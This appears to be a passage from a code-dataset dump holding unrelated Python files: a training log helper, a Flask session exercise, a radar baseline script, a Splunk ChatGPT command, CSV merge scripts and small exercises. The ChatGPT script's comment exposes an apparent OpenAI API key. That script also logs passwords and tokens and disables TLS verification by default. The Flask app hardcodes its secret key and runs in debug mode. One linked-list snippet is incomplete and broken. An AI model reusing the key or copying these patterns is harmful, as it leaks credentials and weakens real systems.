[\"name\", \"val\", \"name\", \"reward\", \"value\", \"td_loss\", \"pg_loss\", \"at\", \"delay\", \"queued\", \"su\", \"tu\",\n \"tl\"]\n data = []\n k0 = ['cur_lr', 'data_time', 'train_time', 'forward_time', 'backward_time', 'total_loss', 'grad']\n k1 = ['winloss', 'bo', 'bu', 'effect', 'upgrade', 'battle', 'upgo', 'kl', 'entropy']\n k2 = ['reward', 'value', 'td', 'total', 'at', 'delay', 'queued', 'su', 'tu', 'tl', ]\n all_vars = self.get_var_names('scalar')\n for i in range(max(len(k1), len(k0))):\n d = []\n if i < len(k0):\n if k0[i] == 'grad':\n d += [k0[i], \"{:.6f}\".format(self.var_dict['scalar'][k0[i]].val)]\n else:\n d += [k0[i], \"{:.6f}\".format(self.var_dict['scalar'][k0[i]].avg)]\n else:\n d += ['', '']\n\n if i < len(k1):\n d += [k1[i]]\n vals = []\n for k in k2:\n var_key = k1[i] + '_' + k\n if var_key in all_vars:\n vals.append(\"{:.6f}\".format(self.var_dict['scalar'][var_key].avg))\n else:\n vals.append('')\n d += vals\n data.append(d)\n s = \"\\n\" + tabulate(data, headers=headers, tablefmt='grid')\n return s\n\n\nclass AverageMeter(object):\n r\"\"\"\n Overview:\n Computes and stores the average and current value, scalar and 1D-array\n Interface:\n __init__, reset, update\n \"\"\"\n\n def __init__(self, length=0):\n r\"\"\"\n Overview:\n init AverageMeter class\n Arguments:\n - length (:obj:`int`) : set the default length of iters to average\n \"\"\"\n assert (length > 0)\n self.length = length\n self.reset()\n\n def reset(self):\n r\"\"\"\n Overview:\n reset AverageMeter class\n \"\"\"\n self.history = []\n self.val = 0.0\n self.avg = 0.0\n\n def update(self, val):\n r\"\"\"\n Overview:\n update AverageMeter class, append the val to the history and calculate the average\n Arguments:\n - val (:obj:`numbers.Integral` or :obj:`list` or :obj:`numbers.Real` ) : the latest value\n \"\"\"\n if isinstance(val, torch.Tensor):\n val = val.item()\n assert (isinstance(val, list) or isinstance(val, numbers.Integral) or isinstance(val, numbers.Real))\n self.history.append(val)\n if len(self.history) > self.length:\n del self.history[0]\n\n self.val = self.history[-1]\n self.avg = np.mean(self.history, axis=0)\n\n\nclass DistributionTimeImage(object):\n r\"\"\"\n Overview:\n DistributionTimeImage can be used to store images accorrding to time_steps,\n for data with 3 dims(time, category, value)\n Interface:\n __init__, add_one_time_step, get_image\n \"\"\"\n\n def __init__(self, maxlen=600, val_range=None):\n r\"\"\"\n Overview:\n init the DistributionTimeImage class\n Arguments:\n - maxlen (:obj:`int`): the max length of data inputs\n - val_range (:obj:`dict` or :obj:`None`): contain :obj:`int` type val_range['min'] and val_range['max'],\n default set to None\n \"\"\"\n self.maxlen = maxlen\n self.val_range = val_range\n self.img = np.ones((maxlen, maxlen))\n self.time_step = 0\n self.one_img = np.ones((maxlen, maxlen))\n\n def add_one_time_step(self, data):\n r\"\"\"\n Overview:\n step one timestep in DistributionTimeImage and add the data to distribution image\n Arguments:\n - data (:obj:`np.array`):the data input\n \"\"\"\n assert (isinstance(data, np.ndarray))\n data = np.expand_dims(data, 1)\n data = cv2.resize(data, (1, self.maxlen), interpolation=cv2.INTER_LINEAR)\n if self.time_step >= self.maxlen:\n self.img = np.concatenate([self.img[:, 1:], data])\n else:\n self.img[:, self.time_step:self.time_step + 1] = data\n self.time_step += 1\n\n def get_image(self):\n r\"\"\"\n Overview:\n return the distribution image\n Returns:\n img (:obj:`bp.ndarray`): the calculated distribution image\n \"\"\"\n norm_img = np.copy(self.img)\n valid = norm_img[:, :self.time_step]\n if self.val_range is None:\n valid = (valid - valid.min()) / (valid.max() - valid.min())\n else:\n valid = np.clip(valid, self.val_range['min'], self.val_range['max'])\n valid = (valid - self.val_range['min']) / (self.val_range['max'] - self.val_range['min'])\n norm_img[:, :self.time_step] = valid\n return np.stack([self.one_img, norm_img, norm_img], axis=0)\n\n\ndef pretty_print(result, direct_print=True):\n r\"\"\"\n Overview:\n print the result in a pretty way\n Arguments:\n - result (:obj:`dict`): the result to print\n - direct_print (:obj:`bool`): whether to print directly\n Returns:\n - string (:obj:`str`): the printed result in str format\n \"\"\"\n result = result.copy()\n out = {}\n for k, v in result.items():\n if v is not None:\n out[k] = v\n cleaned = json.dumps(out)\n string = yaml.safe_dump(json.loads(cleaned), default_flow_style=False)\n if direct_print:\n print(string)\n return string\n","sub_path":"ctools/utils/log_helper.py","file_name":"log_helper.py","file_ext":"py","file_size_in_byte":19939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605593215","text":"# Dołączanie modułu flask \n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, url_for, flash, session\nfrom flask import Flask, session\nfrom flask_session import Session\n\n# Tworzenie aplikacji\napp = Flask(\"Flask - Lab\")\n\n# Tworzenie obsługi sesji\nsess = Session()\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # Sprawdzenie czy w sesji dla danego klienta zapisana jest nazwa użytkownika\n if 'user' in session:\n return render_template('t3.html', userdata=session['user'])\n else:\n return render_template('t1.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n # Stworzenie sesji dla kilenta i dodanie pola user\n req_form = request.form.to_dict()\n session['user']= req_form\n return \"Sesja została utworzona
    Dalej \"\n\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n # Jeżeli sesja klienta istnieje - usunięcie sesji \n if 'user' in session:\n session.pop('user')\n else:\n # Przekierowanie klienta do strony początkowej\n redirect(url_for('index'))\n \n return \"Wylogowano
    Powrót \"\n\n# Uruchomienie aplikacji w trybie debug\napp.secret_key = 'super secret key'\napp.config['SESSION_TYPE'] = 'filesystem'\nsess.init_app(app)\napp.config.from_object(__name__)\napp.debug = True\napp.run()","sub_path":"Flask exercise/Flask - Przyklad 5.py","file_name":"Flask - Przyklad 5.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352075591","text":"#!/usr/bin/env python\nimport numpy as np\nimport os\nimport glob\nimport json\nfrom netCDF4 import Dataset\nfrom .aux.file_to_radar_object import file_to_radar_object\nfrom .aux.get_var_arrays_from_radar_object import get_var_arrays_from_radar_object\nfrom .calculate_dbz95 import calculate_dbz95_ppi, calculate_dbz95_rhi\n\n\ndef baseline(radar_config_file, filters=False):\n \"\"\"\n baseline loops through a day's worth of radar files (specify PPI or HSRHI),\n calculates the median daily 95th percentile clutter area reflectivity,\n and saves the value to a netCDF as the baseline 95th percentile clutter area reflectivity.\n \n Parameters\n ----------\n radar_config_file: str\n path to JSON file containing specifications: data directory, file extension, clutter map directory, output directory for baseline netCDF, baseline date, scan type, polarization, site, instrument, range limit\n filters: boolean\n Include IAH and RH filters \n \"\"\"\n\n config_vars = json.load(open(radar_config_file))\n datadir = config_vars[\"data_directory\"]\n extension = config_vars[\"file_extension\"]\n extension = \".v0\"\n cluttermap_dir = config_vars[\"cluttermap_directory\"]\n baseline_dir = config_vars[\"baseline_directory\"]\n baseline_date = config_vars[\"baseline_date\"]\n dailycsvdir = config_vars[\"daily_csv_dir\"]\n scantype = config_vars[\"scan_type\"]\n polarization = config_vars[\"polarization\"]\n site = config_vars[\"site_abbrev\"]\n inst = config_vars[\"instrument_abbrev\"]\n range_limit = config_vars[\"range_limit\"]\n \n # Identify which radar band you are using (change if statement as needed)\n # Most important to identify Ka-band radars\n if inst == 'kasacr':\n radar_band = 'ka'\n else:\n radar_band = inst[0]\n\n # Identify which radar band you are using (change if statement as needed)\n # Most important to identify Ka-band radars\n if inst == \"kasacr\":\n radar_band = \"ka\"\n else:\n radar_band = inst[0]\n\n # Read in clutter map netCDF\n dataset = Dataset(\n cluttermap_dir\n + \"cluttermap_\"\n + scantype\n + \"_\"\n + site\n + inst\n + \"_\"\n + \"composite\"\n + \".nc\"\n )\n if scantype == \"ppi\":\n clutter_map_mask_h = dataset.variables[\"clutter_map_mask_zh\"][:, :]\n elif scantype == \"rhi\":\n clutter_map_mask_h = dataset.variables[\"clutter_map_mask_zh\"][:, :, :]\n if polarization == \"dual\" and scantype == \"ppi\":\n clutter_map_mask_v = dataset.variables[\"clutter_map_mask_zv\"][:, :]\n elif polarization == \"dual\" and scantype == \"rhi\":\n clutter_map_mask_v = dataset.variables[\"clutter_map_mask_zv\"][:, :, :]\n dataset.close()\n\n # Prep for filters, if argument is set to True (read in and grab variables)\n if filters==True:\n dataset_f = Dataset(\n dailycsvdir+\"filters/corkasacr/\"\n + \"filters_\"\n + scantype\n + \"_\"\n + site\n + inst\n + \"_\"\n + baseline_date\n + \".nc\"\n )\n\n total_filter = dataset_f.variables[\"iah_and_rh_filter\"][:]\n rh_value = dataset_f.variables[\"rh_value\"][:]\n #datetime = dataset_f.variables[\"datetime\"][:]\n dataset_f.close()\n\n # Empty lists to fill in loops below\n date_time = [] # date and time strings\n dbz95_h = [] # 95th percentile reflectivity in H\n dbz95_v = [] # 95th percentile reflectivity in V\n pass_filter = []\n\n # Read in each radar file and turn into radar object and use function to\n # calculate 95th percentile clutter area reflectivity\n \n # Will use glob, so grab all files and then sort by datetime\n files = []\n for f in glob.glob(os.path.join(datadir, \"*\" + baseline_date + \".*.*\")):\n files.append(f)\n files.sort()\n print(files[0:10])\n\n if polarization == \"horizontal\":\n for idx_f, f in enumerate(files): \n print(f)\n radar = file_to_radar_object(f, extension)\n var_dict = get_var_arrays_from_radar_object(radar, radar_config_file)\n if scantype == \"ppi\":\n dt, s_h = calculate_dbz95_ppi(\n var_dict,\n polarization,\n range_limit,\n radar_band,\n clutter_map_mask_h,\n clutter_mask_v=None,\n )\n elif scantype == \"rhi\":\n dt, s_h = calculate_dbz95_rhi(\n var_dict,\n polarization,\n range_limit,\n radar_band,\n clutter_map_mask_h,\n clutter_mask_v=None,\n )\n date_time.append(dt[0:19])\n dbz95_h.append(s_h[\"reflectivity_95\"])\n\n if filters==True:\n # Read in filters array\n pass_filter.append(total_filter[idx_f])\n \n # Calculate median 95th percentile clutter area reflecitivty from all times in day\n dbz95_h = np.array(dbz95_h)\n if filters==True:\n pass_filter = np.array(pass_filter)\n dbz95_h_baseline = np.nanmedian(dbz95_h[pass_filter > 0])\n else:\n dbz95_h_baseline = np.nanmedian(dbz95_h)\n\n # Write baseline 95th reflectivity values to a netCDF file\n d = Dataset(\n baseline_dir\n + \"baseline_\"\n + scantype\n + \"_\"\n + site\n + inst\n + \"_\"\n + baseline_date\n + \".nc\",\n \"w\",\n format=\"NETCDF4\",\n )\n value = d.createDimension(\"value\", 1)\n dbz95_h_base = d.createVariable(\"baseline_dbz95_zh\", np.float64, (\"value\",))\n dbz95_h_base.long_name = \"Baseline 95th percentile reflectivity (H)\"\n dbz95_h_base[:] = dbz95_h_baseline\n d.close()\n\n return dbz95_h_baseline\n\n elif polarization == \"dual\":\n for idx_f, f in enumerate(files): \n print(f)\n radar = file_to_radar_object(f, extension)\n var_dict = get_var_arrays_from_radar_object(radar, radar_config_file)\n if scantype == \"ppi\":\n dt, s_h, s_v = calculate_dbz95_ppi(\n var_dict,\n polarization,\n range_limit,\n radar_band,\n clutter_map_mask_h,\n clutter_mask_v=clutter_map_mask_v,\n )\n elif scantype == \"rhi\":\n dt, s_h, s_v = calculate_dbz95_rhi(\n var_dict,\n polarization,\n range_limit,\n radar_band,\n clutter_map_mask_h,\n clutter_mask_v=clutter_map_mask_v,\n )\n date_time.append(dt)\n dbz95_h.append(s_h[\"reflectivity_95\"])\n dbz95_v.append(s_v[\"reflectivity_95\"])\n\n if filters==True:\n # Read in filters array\n pass_filter.append(total_filter[idx_f])\n\n # Calculate median 95th percentile clutter area reflecitivty from all\n # times in day\n if filters==True:\n dbz95_h_baseline = np.nanmedian(dbz95_h[pass_filter > 0])\n dbz95_v_baseline = np.nanmedian(dbz95_v[pass_filter > 0])\n else:\n dbz95_h_baseline = np.nanmedian(dbz95_h)\n dbz95_v_baseline = np.nanmedian(dbz95_v)\n\n # Write baseline 95th reflectivity values to a netCDF file\n d = Dataset(\n baseline_dir\n + \"baseline_\"\n + scantype\n + \"_\"\n + site\n + inst\n + \"_\"\n + baseline_date\n + \".nc\",\n \"w\",\n format=\"NETCDF4\",\n )\n value = d.createDimension(\"value\", 1)\n dbz95_h_base = d.createVariable(\"baseline_dbz95_zh\", np.float64, (\"value\",))\n dbz95_v_base = d.createVariable(\"baseline_dbz95_zv\", np.float64, (\"value\",))\n dbz95_h_base.long_name = \"Baseline 95th percentile reflectivity (H)\"\n dbz95_v_base.long_name = \"Baseline 95th percentile reflectivity (V)\"\n dbz95_h_base[:] = dbz95_h_baseline\n dbz95_v_base[:] = dbz95_v_baseline\n d.close()\n\n return dbz95_h_baseline, dbz95_v_baseline\n","sub_path":"src/rca/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"585637549","text":"\nimport json\nimport requests\nimport splunk.Intersplunk\nimport splunk.mining.dcutils as dcu\nimport time\nimport traceback\nimport re\nimport sys\nimport socket\n\nlogger = dcu.getLogger()\n\nCHATGPT_URL=\"https://api.openai.com/v1/chat/completions\"\nCHATGPT_MODEL=\"gpt-3.5-turbo\"\n\n# Default Setting\n# 초기값 세팅\ntoken=None\ncert=None\nuser=None\npasswd=None\n\ndef getResponse(r, uri):\n response = {}\n response['status'] = r.status_code\n response['message'] = r.text\n response['url'] = r.url\n return (response)\n\ndef getException(e, uri):\n response = {}\n response['status'] = 408\n response['message'] = str(e)\n response['url'] = uri\n return (response)\n\n# token Key\n# model\n# role\n# content\n#| chatgpt method=post timeout=120 headers=\"{\\\"Authorization\\\" : \\\"Bearer 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\\\", \\\"Content-Type\\\" : \\\"application/json\\\" }\" data=\"{\\\"model\\\":\\\"gpt-3.5-turbo\\\",\\\"messages\\\": [{\\\"role\\\": \\\"user\\\", \\\"content\\\": \\\"python gugudan example\\\"}]}\" debug=true verify=False\n#| spath input=curl_message output=entry path=choices{}.message.content\n#| table entry\n\ndef requestMethod( uri , token, cert, headers=None, payload=None, user=None, password=None, timeout=60, verify=True, method=\"post\"):\n\n try:\n #payload = json.loads(payload)\n \n if(headers == None) :\n headers = {}\n headers[\"Authorization\"] = \"Bearer %s\" % token\n headers[\"Content-Type\"] = \"application/json\"\n if(token == None) :\n headers[\"Authorization\"] = \"Bearer %s\" % token\n headers[\"Content-Type\"] = \"application/json\"\n \n logger.error(\"--------------------------------------------------------------\")\n logger.error(\"uri : {}\".format(uri))\n logger.error(\"token : {}\".format(token))\n logger.error(\"cert : {}\".format(cert))\n logger.error(\"user : {}\".format(user))\n logger.error(\"password : {}\".format(password))\n logger.error(\"timeout : {}\".format(timeout))\n logger.error(\"verify : {}\".format(verify))\n logger.error(\"method : {}\".format(method))\n logger.error(\"headers : {}\".format(headers))\n logger.error(\"data : {}\".format(payload))\n logger.error(\"## headers : {}\".format(type(headers)))\n logger.error(\"## data : {}\".format(type(payload)))\n\n if token == None:\n if user == None and password == None:\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", \"del\", \"d\"):\n r = requests.delete(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n else:\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, auth=(user, password), params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, auth=(user, password), params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", \"del\", \"d\"):\n r = requests.delete(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n else:\n\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", \"del\", \"d\"):\n r = requests.delete(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n\n return (getResponse(r, uri))\n except requests.exceptions.RequestException as e:\n return (getException(e, uri))\n\ndef syntaxErr():\n results = None\n stack = traceback.format_exc()\n e = \"syntax: | chatgpt [ choice: uri= OR urifield= ] token= content= \" \\\n + \"[ optional: method= datafield= \"\\\n + \"data= user= pass= debug= \"\\\n + \"timeout= | verify=]\"\n splunk.Intersplunk.generateErrorResults(str(e))\n logger.error(str(e) + \". Traceback: \" + str(stack))\n return\n\ndef errorMsg(msg=\"This is the default error message\"):\n results = None\n stack = traceback.format_exc()\n splunk.Intersplunk.generateErrorResults(str(msg))\n logger.error(str(msg) + \". Traceback: \" + str(stack))\n\n\ndef enforceHTTPS(uri=None):\n try:\n if re.search(\"^https:\\/\\/\", uri) == None:\n errorMsg(\n 'uri field must start with \"https://\" and curl was provided with the following uri: \"' + str(uri) + '\"')\n quit()\n except Exception as e:\n errorMsg(str(e))\n quit()\n\n\ndef execute():\n try:\n\n # get the keywords suplied to the curl command\n argv = splunk.Intersplunk.win32_utf8_argv() or sys.argv\n \n # for each arg\n first = True\n options = {}\n pattern = re.compile(\"^\\s*([^=]+)=(.*)\")\n\n ## 초기값(Default)\n options['uri'] = CHATGPT_URL\n\n for arg in argv:\n if first:\n first = False\n continue\n else:\n result = pattern.match(arg)\n options[result.group(1)] = result.group(2)\n\n # get the previous search results\n results, dummyresults, settings = splunk.Intersplunk.getOrganizedResults()\n\n # some options are required, raise error and give syntax if they are not given\n if 'uri' not in options and 'urifield' not in options:\n results = None\n syntaxErr()\n else:\n # default to get method if none specified\n if 'method' not in options:\n method = \"post\"\n else:\n method = str(options['method'])\n\n # default to timeout=60\n if 'timeout' in options:\n timeout = float(options['timeout'])\n else:\n timeout = 120\n\n # default uri to None and force https\n if 'uri' in options:\n uri = str(options['uri'])\n else:\n uri = None\n \n # default token\n if 'token' in options:\n token = str(options['token'])\n else:\n token = None\n\n # default role\n if 'role' in options:\n role = str(options['role'])\n else:\n role = \"user\"\n\n # default content\n if 'content' in options:\n content = str(options['content'])\n else:\n content = None\n\n # default model\n if 'model' in options:\n model = str(options['model'])\n else:\n model = CHATGPT_MODEL\n\n if 'verify' not in options:\n verify = False\n else:\n if options['verify'].lower() == \"false\":\n verify = False\n else:\n verify = True\n\n if 'headers' in options:\n user_headers = json.loads(options['headers'])\n else:\n user_headers = None\n\n\n # STREAMING Use Case: iterate through results and run curl commands\n if len(results) > 0:\n # https://github.com/bentleymi/ta-webtools/issues/4$\n # use sleep if provided sleep the defined amount after the first iteration$\n sleepCounter = 0\n\n for result in results:\n # https://github.com/bentleymi/ta-webtools/issues/4\n # use sleep if provided sleep the defined amount after the first iteration\n if 'sleep' in options:\n sleep = int(options['sleep'])\n if sleepCounter > 0:\n time.sleep(sleep)\n sleepCounter = sleepCounter+1\n else:\n sleep = None\n\n # use urifield if provided\n if 'urifield' in options:\n uri = result[options['urifield']]\n\n # use JSON encoded header string if provided\n if 'headerfield' in options:\n headers = json.loads(result[options['headerfield']])\n elif 'headers' in options:\n headers = user_headers\n else:\n headers = None\n\n # if data in options, set data = options['data']\n if 'data' in options:\n data = str(options['data'])\n\n # if datafield in options, set datafield = options['datafield']\n if 'datafield' in options:\n try:\n data = json.loads(result[options['datafield']])\n except:\n data = str(result[options['datafield']])\n else:\n data = None\n\n # debugging option\n if 'debug' in options:\n if options['debug'].lower() in (\"yes\", \"true\", \"t\", \"1\"):\n # for debugging we add results which show the options \\\n # that were sent to the curl command\n result['curl_method'] = method\n result['curl_verifyssl'] = \"Default False\"\n result['curl_uri'] = uri\n if data != None:\n result['curl_data_payload'] = data\n if headers:\n result['curl_header'] = headers\n if user_headers:\n result['user_headers'] = user_headers\n if sleep:\n result['curl_sleep'] = sleep\n\n # enforce HTTPS in uri field\n enforceHTTPS(uri)\n\n #logger.error(\"--------------------------------------------------------------\")\n #logger.error(\"### headers : {}, data : {}\".format(type(headers),type(data)))\n #logger.error(\"### headers : {}, data : {}\".format(headers,data))\n\n Result = requestMethod(uri, token, cert, headers, data, user, passwd, timeout, method)\n\n # append the result to results in the splunk search pipeline\n result['curl_status'] = Result['status']\n result['curl_message'] = Result['message']\n #result['curl_content'] = str(json.loads(Result['message']).get('choices')[0]['message']['content'])\n\n # NON-STREAMING Use Case: do not iterate through results, just run curl command\n # this mode doesnt support headerfield but supports the header= field\n else:\n # build splunk result payload\n result = {}\n results = []\n\n # if user specifed data manually\n if 'data' in options:\n data = str(options['data'])\n else:\n data = None\n\n if (data == None) :\n input_data = {}\n else :\n input_data = json.loads(data)\n\n if(model != None) :\n input_data['model']=model\n\n data_dict = dict()\n data_dict['role'] = role\n data_dict['content'] = content\n\n input_data['messages'] = list()\n input_data['messages'].append(data_dict)\n\n data = json.dumps(input_data)\n\n # debug option\n if 'debug' in options:\n if options['debug'].lower() in (\"yes\", \"true\", \"t\", \"1\"):\n # for debugging we add results which show the options \\\n # that were sent to the curl command\n result['curl_method'] = method\n result['curl_verifyssl'] = \"Default False\"\n result['curl_uri'] = uri\n if data != None:\n result['curl_data_payload'] = data\n if user_headers:\n result['user_headers'] = user_headers\n \n # enforce HTTPS in uri field\n enforceHTTPS(uri)\n\n #logger.error(\"--------------------------------------------------------------\")\n #logger.error(\"### TYPE headers : {}, data : {}\".format(type(user_headers),type(data)))\n #logger.error(\"### DATA headers : {}, data : {}\".format(user_headers,data))\n logger.error(\"### DATA content : {}, data : {}\".format(type(content),content))\n\n if(content == None or content ==\"\" ) :\n result['curl_message'] = \"ChatGPT 검색어를 입력해주세요.\"\n else :\n Result = requestMethod( uri, token, cert, user_headers, data, user, passwd, timeout, verify, method)\n \n # append the result to splunk result payload\n result['curl_status'] = Result['status']\n result['curl_message'] = Result['message']\n if(json.loads(Result['message']).get('choices')) : \n result['curl_content'] = str(json.loads(Result['message']).get('choices')[0]['message']['content'])\n \n results.append(result)\n\n # output results\n splunk.Intersplunk.outputResults(results)\n\n except Exception as e:\n stack = traceback.format_exc()\n splunk.Intersplunk.generateErrorResults(str(e))\n logger.error(str(e) + \". Traceback: \" + str(stack))\n\n\nif __name__ == '__main__':\n execute()","sub_path":"MegaSphereApp/bin/chatGPT.py","file_name":"chatGPT.py","file_ext":"py","file_size_in_byte":16334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"165028917","text":"import pandas as pd\nimport numpy as np\nstartupData = pd.read_csv('../metaOutput/internKeyurMerge.csv')\ncrunchbase = pd.read_csv('../metaOutput/crunchbaseData.csv')\n\n# Get the union of rows where no information is present\n\n# startupData['founderName'] = crunchbase[startupData.startupName.isin(crunchbase.startupName)]['founderName']\ncommonData = crunchbase[crunchbase.startupName.isin(startupData.startupName)]\n\nstartupData= pd.merge(startupData,commonData,how='outer',on='startupName')\n\nnullcolumns = startupData[startupData['founderName_x']=='[]']\n\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'founderName_x'] = startupData.loc[index,'founderName_y']\n\n\n\nnullcolumns = startupData[startupData['city_x'].isnull()]\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'city_x'] = startupData.loc[index,'city_y']\n\nnullcolumns = startupData[startupData['website_x'].isnull()]\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'website_x'] = startupData.loc[index,'website_y']\n#\nstartupData[\"founderName\"] = startupData[\"founderName_x\"]\nstartupData[\"city\"] = startupData[\"city_x\"]\nstartupData[\"website\"] = startupData[\"website_x\"]\n# # for index,row in commonData.iterrows():\n# # print type(row['founderName_x'])\n# # if (row['founderName_x']!=np.nan):\n# # commonData.loc[index,'founderName'] = row['founderName_x']\n# # else:\n# # commonData.loc[index,'founderName'] = row['founderName_y']\n# #\n# # if (row['city_x']!=np.nan):\n# # commonData.loc[index,'city'] = row['city_x']\n# # else:\n# # commonData.loc[index,'city'] = row['city_y']\n# #\n#\nstartupData.drop(['founderName_x','founderName_y','city_x','city_y','website_x','website_y'],axis=1,inplace=True)\n#\n# startupData = pd.merge(startupData.drop(['founderName','city','website'],axis=1),commonData[['startupName','founderName','website','city']],how='outer',on='startupName')\n\nstartupData.loc[startupData['founderName'].isnull(),'founderName'] = '[]'\n# print startupData.columns\nstartupData.to_csv('../metaOutput/internCrunchbaseMerge.csv', index=False)","sub_path":"dataGeneration/mergingRoutines/internCrunchBaseMerge.py","file_name":"internCrunchBaseMerge.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523647879","text":"__author__ = 'yinyan'\n\"\"\"\nGiven a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number not the value in the nodes.\n\nYou should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.\n\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\"\"\"\n#definition for singly-linked list\nclass ListNode(object):\n def __init__(self, x):\n self.val=x\n self.next=None\n\nclass Solution(object):\n def oddEvenList1(self, head):\n \"\"\"\n :param head: ListNode\n :return: ListNode\n \"\"\"\n dummy1=odd=head\n dummy2=even=head.next\n\n while head:\n odd.next=head\n even.next=head.next\n odd=odd.next\n even=even.next\n head=head.next.next if even else None\n odd.next=dummy","sub_path":"Algo/OddEvenLinkedList.py","file_name":"OddEvenLinkedList.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"274670484","text":"#Ask the user for a string and count the number of letter ‘a’ in that string.\ndef count_a (string):\n\tarray = list(string)\n\tprint (array)\n\tcount = 0\n\tfor i in range(len(array)):\n\t\tif array[i] == \"a\" or array[i] == \"A\":\n\t\t\tcount = count + 1\n\tprint (\"Number of letter \\\"a\\\" in the string: \" + str(count))\n\n\ndef main ():\n\t#Main program.\n\tx = input(\"Write a sentence or text of any lenght.\\n\")\n\tcount_a(x)\n\nmain()","sub_path":"letter_count.py","file_name":"letter_count.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88398976","text":"from datetime import datetime\nimport functools\nimport itertools\n\nimport numpy as np\nimport pandas as pd\n\nfrom .pycompat import (OrderedDict, iteritems, itervalues, unicode_type,\n bytes_type)\n\n\ndef pretty_print(x, numchars):\n \"\"\"Given an object `x`, call `str(x)` and format the returned string so\n that it is numchars long, padding with trailing spaces or truncating with\n ellipses as necessary\n \"\"\"\n s = str(x)\n if len(s) > numchars:\n return s[:(numchars - 3)] + '...'\n else:\n return s + ' ' * (numchars - len(s))\n\n\ndef wrap_indent(text, start='', length=None):\n if length is None:\n length = len(start)\n indent = '\\n' + ' ' * length\n return start + indent.join(x for x in text.splitlines())\n\n\ndef _get_indexer_at_least_n_items(shape, n_desired):\n assert 0 < n_desired <= np.prod(shape)\n cum_items = np.cumprod(shape[::-1])\n n_steps = np.argmax(cum_items >= n_desired)\n stop = int(np.ceil(float(n_desired) / np.r_[1, cum_items][n_steps]))\n indexer = ((0,) * (len(shape) - 1 - n_steps) + (slice(stop),)\n + (slice(None),) * n_steps)\n return indexer\n\n\ndef first_n_items(x, n_desired):\n \"\"\"Returns the first n_desired items of an array\"\"\"\n # Unfortunately, we can't just do x.flat[:n_desired] here because x might\n # not be a numpy.ndarray. Moreover, access to elements of x could be very\n # expensive (e.g. if it's only available over DAP), so go out of our way to\n # get them in a single call to __getitem__ using only slices.\n if n_desired < 1:\n raise ValueError('must request at least one item')\n\n if x.size == 0:\n # work around for https://github.com/numpy/numpy/issues/5195\n return []\n\n if n_desired < x.size:\n indexer = _get_indexer_at_least_n_items(x.shape, n_desired)\n x = x[indexer]\n return np.asarray(x).flat[:n_desired]\n\n\ndef format_timestamp(t):\n \"\"\"Cast given object to a Timestamp and return a nicely formatted string\"\"\"\n datetime_str = str(pd.Timestamp(t))\n try:\n date_str, time_str = datetime_str.split()\n except ValueError:\n # catch NaT and others that don't split nicely\n return datetime_str\n else:\n if time_str == '00:00:00':\n return date_str\n else:\n return '%sT%s' % (date_str, time_str)\n\n\ndef format_item(x):\n \"\"\"Returns a succinct summary of an object as a string\"\"\"\n if isinstance(x, (np.datetime64, 